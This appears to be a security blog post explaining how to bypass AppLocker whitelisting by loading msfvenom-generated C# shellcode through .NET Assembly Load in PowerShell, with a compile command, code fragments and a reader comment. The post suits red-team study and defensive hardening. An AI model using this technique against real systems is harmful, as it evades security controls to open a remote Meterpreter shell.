It is possible in an environment that AppLocker is enabled to run an executable due to the way that assemblies are loaded in .NET applications. This bypass method was discovered by Casey Smith and it was presented in ShmooCon 2015. The Assembly Load method is able to call a file from three different locations:

  • Memory // Byte[]
  • Location on the disk
  • From a URL

The .NET assembly originally is loaded with Read permissions in order to enumerate the methods and properties associated with the binary and then permissions are changed to Execute so AppLocker or any whitelisting application cannot identify that something was executed on the system.

Bypassing AppLocker with this method consists of three steps:

  • Generate C# ShellCode
  • Compile the .NET application
  • Execute ShellCode from Memory with Assembly Load

Metasploit MSFvenom can be used to generate C# shellcode:

C# Shellcode
C# Shellcode Generation

The Shellcode above can be injected into the C# file which then can be compiled by the csc utility which is part of the .NET framework in order to generate the executable.

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe  /unsafe /platform:x86 /out:shellcode.exe shellcode.cs
Compiling C# Code to Executable
Compiling C# Code to Executable

Running the executable directly or from Powershell will fail since this binary is not whitelisted with an AppLocker rule.

AppLocker Rule - Block Executables
AppLocker Rule – Block Executables
AppLocker Rule - Block ShellCode Binary
AppLocker Rule – Block ShellCode Binary

However it is possible to bypass this restriction by using the loading assembly method in PowerShell in order to execute the ShellCode which is inside the file and it is defined as a method directly from memory.

public class Shellcode
public static void Exec()
// native function's compiled code
byte[] shellcode = new byte[354] {

The following needs to be executed from PowerShell:

$bytes = [System.IO.File]::ReadAllBytes(“C:\shellcode.exe")
Assembly Load
Assembly Load

The shellcode will be executed and a Meterpreter session will open.

Meterpreter - ShellCode
Meterpreter – Shellcode



  1. Thanks!
    In case of use the ConstrainedLanguage setting for powershell, do you know if this prevent this method?
    Thanks again!

Leave a Reply to Anonymous Cancel reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s